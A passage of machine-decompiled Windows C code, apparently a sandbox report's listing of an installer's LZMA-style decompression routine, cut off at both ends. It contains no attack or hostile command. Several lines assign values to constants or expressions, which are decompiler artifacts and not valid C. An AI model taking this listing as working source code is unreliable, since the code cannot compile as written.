                      											 *(_t644 - 4) = _t538;
                      											if(_t538 == 0) {
                      												goto L171;
                      											} else {
                      												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                      												goto L10;
                      											}
                      										case 1:
                      											L13:
                      											__eflags =  *(_t644 - 0x6c);
                      											if( *(_t644 - 0x6c) == 0) {
                      												L157:
                      												 *(_t644 - 0x88) = 1;
                      												goto L170;
                      											}
                      											L14:
                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                      											_t45 = _t644 - 0x48;
                      											 *_t45 =  *(_t644 - 0x48) + 1;
                      											__eflags =  *_t45;
                      											L15:
                      											if( *(_t644 - 0x48) < 4) {
                      												goto L13;
                      											}
                      											L16:
                      											_t550 =  *(_t644 - 0x40);
                      											if(_t550 ==  *(_t644 - 0x74)) {
                      												L20:
                      												 *(_t644 - 0x48) = 5;
                      												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                      												goto L23;
                      											}
                      											L17:
                      											 *(_t644 - 0x74) = _t550;
                      											if( *(_t644 - 8) != 0) {
                      												GlobalFree( *(_t644 - 8));
                      											}
                      											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                      											 *(_t644 - 8) = _t538;
                      											if(_t538 == 0) {
                      												goto L171;
                      											} else {
                      												goto L20;
                      											}
                      										case 2:
                      											L24:
                      											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                      											 *(_t644 - 0x84) = 6;
                      											 *(_t644 - 0x4c) = _t557;
                      											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                      											goto L132;
                      										case 3:
                      											L21:
                      											__eflags =  *(_t644 - 0x6c);
                      											if( *(_t644 - 0x6c) == 0) {
                      												L158:
                      												 *(_t644 - 0x88) = 3;
                      												goto L170;
                      											}
                      											L22:
                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      											_t67 = _t644 - 0x70;
                      											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                      											__eflags =  *_t67;
                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                      											L23:
                      											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                      											if( *(_t644 - 0x48) != 0) {
                      												goto L21;
                      											}
                      											goto L24;
                      										case 4:
                      											L133:
                      											_t559 =  *_t642;
                      											_t626 = _t559 & 0x0000ffff;
                      											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                      											if( *(_t644 - 0xc) >= _t596) {
                      												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                      												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                      												 *(_t644 - 0x40) = 1;
                      												_t560 = _t559 - (_t559 >> 5);
                      												__eflags = _t560;
                      												 *_t642 = _t560;
                      											} else {
                      												 *(_t644 - 0x10) = _t596;
                      												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                      												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                      											}
                      											if( *(_t644 - 0x10) >= 0x1000000) {
                      												goto L139;
                      											} else {
                      												goto L137;
                      											}
                      										case 5:
                      											L137:
                      											if( *(_t644 - 0x6c) == 0) {
                      												L168:
                      												 *(_t644 - 0x88) = 5;
                      												goto L170;
                      											}
                      											L138:
                      											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                      											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                      											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                      											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                      											L139:
                      											_t537 =  *(_t644 - 0x84);
                      											L140:
                      											 *(_t644 - 0x88) = _t537;
                      											goto L1;
                      										case 6:
                      											L25:
                      											__edx = 0;
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												L36:
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x34) = 1;
                      												 *(__ebp - 0x84) = 7;
                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      												goto L132;
                      											}
                      											L26:
                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      											__esi =  *(__ebp - 0x60);
                      											__cl = 8;
                      											__cl = 8 -  *(__ebp - 0x3c);
                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      											__ecx =  *(__ebp - 0x3c);
                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      											__ecx =  *(__ebp - 4);
                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      											__eflags =  *(__ebp - 0x38) - 4;
                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											if( *(__ebp - 0x38) >= 4) {
                      												__eflags =  *(__ebp - 0x38) - 0xa;
                      												if( *(__ebp - 0x38) >= 0xa) {
                      													_t98 = __ebp - 0x38;
                      													 *_t98 =  *(__ebp - 0x38) - 6;
                      													__eflags =  *_t98;
                      												} else {
                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      												}
                      											} else {
                      												 *(__ebp - 0x38) = 0;
                      											}
                      											__eflags =  *(__ebp - 0x34) - __edx;
                      											if( *(__ebp - 0x34) == __edx) {
                      												L35:
                      												__ebx = 0;
                      												__ebx = 1;
                      												goto L61;
                      											} else {
                      												L32:
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__ecx =  *(__ebp - 8);
                      												__ebx = 0;
                      												__ebx = 1;
                      												__al =  *((intOrPtr*)(__eax + __ecx));
                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      												goto L41;
                      											}
                      										case 7:
                      											L66:
                      											__eflags =  *(__ebp - 0x40) - 1;
                      											if( *(__ebp - 0x40) != 1) {
                      												L68:
                      												__eax =  *(__ebp - 0x24);
                      												 *(__ebp - 0x80) = 0x16;
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												__eax =  *(__ebp - 0x2c);
                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xa;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      												__eax =  *(__ebp - 4);
                      												__eax =  *(__ebp - 4) + 0x664;
                      												__eflags = __eax;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L69;
                      											}
                      											L67:
                      											__eax =  *(__ebp - 4);
                      											__ecx =  *(__ebp - 0x38);
                      											 *(__ebp - 0x84) = 8;
                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      											goto L132;
                      										case 8:
                      											L70:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xa;
                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      											} else {
                      												__eax =  *(__ebp - 0x38);
                      												__ecx =  *(__ebp - 4);
                      												__eax =  *(__ebp - 0x38) + 0xf;
                      												 *(__ebp - 0x84) = 9;
                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      											}
                      											goto L132;
                      										case 9:
                      											L73:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												goto L90;
                      											}
                      											L74:
                      											__eflags =  *(__ebp - 0x60);
                      											if( *(__ebp - 0x60) == 0) {
                      												goto L171;
                      											}
                      											L75:
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                      											__eflags = _t259;
                      											0 | _t259 = _t259 + _t259 + 9;
                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                      											goto L76;
                      										case 0xa:
                      											L82:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												L84:
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xb;
                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      												goto L132;
                      											}
                      											L83:
                      											__eax =  *(__ebp - 0x28);
                      											goto L89;
                      										case 0xb:
                      											L85:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__ecx =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x20);
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      											} else {
                      												__eax =  *(__ebp - 0x24);
                      											}
                      											__ecx =  *(__ebp - 0x28);
                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      											L89:
                      											__ecx =  *(__ebp - 0x2c);
                      											 *(__ebp - 0x2c) = __eax;
                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      											L90:
                      											__eax =  *(__ebp - 4);
                      											 *(__ebp - 0x80) = 0x15;
                      											__eax =  *(__ebp - 4) + 0xa68;
                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      											goto L69;
                      										case 0xc:
                      											L99:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L164:
                      												 *(__ebp - 0x88) = 0xc;
                      												goto L170;
                      											}
                      											L100:
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t334 = __ebp - 0x70;
                      											 *_t334 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t334;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											__eax =  *(__ebp - 0x2c);
                      											goto L101;
                      										case 0xd:
                      											L37:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L159:
                      												 *(__ebp - 0x88) = 0xd;
                      												goto L170;
                      											}
                      											L38:
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t122 = __ebp - 0x70;
                      											 *_t122 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t122;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L39:
                      											__eax =  *(__ebp - 0x40);
                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      												goto L48;
                      											}
                      											L40:
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												goto L54;
                      											}
                      											L41:
                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      											__ecx =  *(__ebp - 0x58);
                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      											 *(__ebp - 0x48) = __eax;
                      											__eax = __eax + 1;
                      											__eax = __eax << 8;
                      											__eax = __eax + __ebx;
                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edx = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												 *(__ebp - 0x40) = 1;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												__ebx = __ebx + __ebx + 1;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edx;
                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L39;
                      											} else {
                      												L45:
                      												goto L37;
                      											}
                      										case 0xe:
                      											L46:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L160:
                      												 *(__ebp - 0x88) = 0xe;
                      												goto L170;
                      											}
                      											L47:
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t156 = __ebp - 0x70;
                      											 *_t156 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t156;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											while(1) {
                      												L48:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													break;
                      												}
                      												L49:
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t170 = __edx + 1; // 0x1
                      													__ebx = _t170;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													continue;
                      												} else {
                      													L53:
                      													goto L46;
                      												}
                      											}
                      											L54:
                      											_t173 = __ebp - 0x34;
                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      											__eflags =  *_t173;
                      											goto L55;
                      										case 0xf:
                      											L58:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L161:
                      												 *(__ebp - 0x88) = 0xf;
                      												goto L170;
                      											}
                      											L59:
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t203 = __ebp - 0x70;
                      											 *_t203 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t203;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L60:
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												L55:
                      												__al =  *(__ebp - 0x44);
                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      												goto L56;
                      											}
                      											L61:
                      											__eax =  *(__ebp - 0x58);
                      											__edx = __ebx + __ebx;
                      											__ecx =  *(__ebp - 0x10);
                      											__esi = __edx + __eax;
                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edi = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												_t217 = __edx + 1; // 0x1
                      												__ebx = _t217;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edi;
                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L60;
                      											} else {
                      												L65:
                      												goto L58;
                      											}
                      										case 0x10:
                      											L109:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												L165:
                      												 *(__ebp - 0x88) = 0x10;
                      												goto L170;
                      											}
                      											L110:
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t365 = __ebp - 0x70;
                      											 *_t365 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t365;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											goto L111;
                      										case 0x11:
                      											L69:
                      											__esi =  *(__ebp - 0x58);
                      											 *(__ebp - 0x84) = 0x12;
                      											goto L132;
                      										case 0x12:
                      											L128:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												L131:
                      												__eax =  *(__ebp - 0x58);
                      												 *(__ebp - 0x84) = 0x13;
                      												__esi =  *(__ebp - 0x58) + 2;
                      												L132:
                      												 *(_t644 - 0x54) = _t642;
                      												goto L133;
                      											}
                      											L129:
                      											__eax =  *(__ebp - 0x4c);
                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      											__ecx =  *(__ebp - 0x58);
                      											__eax =  *(__ebp - 0x4c) << 4;
                      											__eflags = __eax;
                      											__eax =  *(__ebp - 0x58) + __eax + 4;
                      											goto L130;
                      										case 0x13:
                      											L141:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												L143:
                      												_t469 = __ebp - 0x58;
                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                      												__eflags =  *_t469;
                      												 *(__ebp - 0x30) = 0x10;
                      												 *(__ebp - 0x40) = 8;
                      												L144:
                      												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                      												L145:
                      												 *(_t644 - 0x50) = 1;
                      												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                      												goto L149;
                      											}
                      											L142:
                      											__eax =  *(__ebp - 0x4c);
                      											__ecx =  *(__ebp - 0x58);
                      											__eax =  *(__ebp - 0x4c) << 4;
                      											 *(__ebp - 0x30) = 8;
                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      											L130:
                      											 *(__ebp - 0x58) = __eax;
                      											 *(__ebp - 0x40) = 3;
                      											goto L144;
                      										case 0x14:
                      											L156:
                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      											__eax =  *(__ebp - 0x80);
                      											while(1) {
                      												L140:
                      												 *(_t644 - 0x88) = _t537;
                      												goto L1;
                      											}
                      										case 0x15:
                      											L91:
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      											__al = __al & 0x000000fd;
                      											__eax = (__eflags >= 0) - 1 + 0xb;
                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      											goto L120;
                      										case 0x16:
                      											goto L0;
                      										case 0x17:
                      											while(1) {
                      												L145:
                      												 *(_t644 - 0x50) = 1;
                      												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                      												goto L149;
                      											}
                      										case 0x18:
                      											goto L146;
                      										case 0x19:
                      											L94:
                      											__eflags = __ebx - 4;
                      											if(__ebx < 4) {
                      												L98:
                      												 *(__ebp - 0x2c) = __ebx;
                      												L119:
                      												_t393 = __ebp - 0x2c;
                      												 *_t393 =  *(__ebp - 0x2c) + 1;
                      												__eflags =  *_t393;
                      												L120:
                      												__eax =  *(__ebp - 0x2c);
                      												__eflags = __eax;
                      												if(__eax == 0) {
                      													L166:
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      													goto L170;
                      												}
                      												L121:
                      												__eflags = __eax -  *(__ebp - 0x60);
                      												if(__eax >  *(__ebp - 0x60)) {
                      													goto L171;
                      												}
                      												L122:
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      												__eax =  *(__ebp - 0x30);
                      												_t400 = __ebp - 0x60;
                      												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      												__eflags =  *_t400;
                      												goto L123;
                      											}
                      											L95:
                      											__ecx = __ebx;
                      											__eax = __ebx;
                      											__ecx = __ebx >> 1;
                      											__eax = __ebx & 0x00000001;
                      											__ecx = (__ebx >> 1) - 1;
                      											__al = __al | 0x00000002;
                      											__eax = (__ebx & 0x00000001) << __cl;
                      											__eflags = __ebx - 0xe;
                      											 *(__ebp - 0x2c) = __eax;
                      											if(__ebx >= 0xe) {
                      												L97:
                      												__ebx = 0;
                      												 *(__ebp - 0x48) = __ecx;
                      												L102:
                      												__eflags =  *(__ebp - 0x48);
                      												if( *(__ebp - 0x48) <= 0) {
                      													L107:
                      													__eax = __eax + __ebx;
                      													 *(__ebp - 0x40) = 4;
                      													 *(__ebp - 0x2c) = __eax;
                      													__eax =  *(__ebp - 4);
                      													__eax =  *(__ebp - 4) + 0x644;
                      													__eflags = __eax;
                      													L108:
                      													__ebx = 0;
                      													 *(__ebp - 0x58) = __eax;
                      													 *(__ebp - 0x50) = 1;
                      													 *(__ebp - 0x44) = 0;
                      													 *(__ebp - 0x48) = 0;
                      													L112:
                      													__eax =  *(__ebp - 0x40);
                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      														L118:
                      														_t391 = __ebp - 0x2c;
                      														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      														__eflags =  *_t391;
                      														goto L119;
                      													}
                      													L113:
                      													__eax =  *(__ebp - 0x50);
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      													__eax =  *(__ebp - 0x58);
                      													__esi = __edi + __eax;
                      													 *(__ebp - 0x54) = __esi;
                      													__ax =  *__esi;
                      													__ecx = __ax & 0x0000ffff;
                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      													__eflags =  *(__ebp - 0xc) - __edx;
                      													if( *(__ebp - 0xc) >= __edx) {
                      														__ecx = 0;
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      														__ecx = 1;
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      														__ebx = 1;
                      														__ecx =  *(__ebp - 0x48);
                      														__ebx = 1 << __cl;
                      														__ecx = 1 << __cl;
                      														__ebx =  *(__ebp - 0x44);
                      														__ebx =  *(__ebp - 0x44) | __ecx;
                      														__cx = __ax;
                      														__cx = __ax >> 5;
                      														__eax = __eax - __ecx;
                      														__edi = __edi + 1;
                      														__eflags = __edi;
                      														 *(__ebp - 0x44) = __ebx;
                      														 *__esi = __ax;
                      														 *(__ebp - 0x50) = __edi;
                      													} else {
                      														 *(__ebp - 0x10) = __edx;
                      														0x800 = 0x800 - __ecx;
                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      														 *__esi = __dx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														L111:
                      														_t368 = __ebp - 0x48;
                      														 *_t368 =  *(__ebp - 0x48) + 1;
                      														__eflags =  *_t368;
                      														goto L112;
                      													} else {
                      														L117:
                      														goto L109;
                      													}
                      												}
                      												L103:
                      												__ecx =  *(__ebp - 0xc);
                      												__ebx = __ebx + __ebx;
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      													__ecx =  *(__ebp - 0x10);
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      													__ebx = __ebx | 0x00000001;
                      													__eflags = __ebx;
                      													 *(__ebp - 0x44) = __ebx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													L101:
                      													_t338 = __ebp - 0x48;
                      													 *_t338 =  *(__ebp - 0x48) - 1;
                      													__eflags =  *_t338;
                      													goto L102;
                      												} else {
                      													L106:
                      													goto L99;
                      												}
                      											}
                      											L96:
                      											__edx =  *(__ebp - 4);
                      											__eax = __eax - __ebx;
                      											 *(__ebp - 0x40) = __ecx;
                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      											goto L108;
                      										case 0x1a:
                      											L56:
                      											__eflags =  *(__ebp - 0x64);
                      											if( *(__ebp - 0x64) == 0) {
                      												L162:
                      												 *(__ebp - 0x88) = 0x1a;
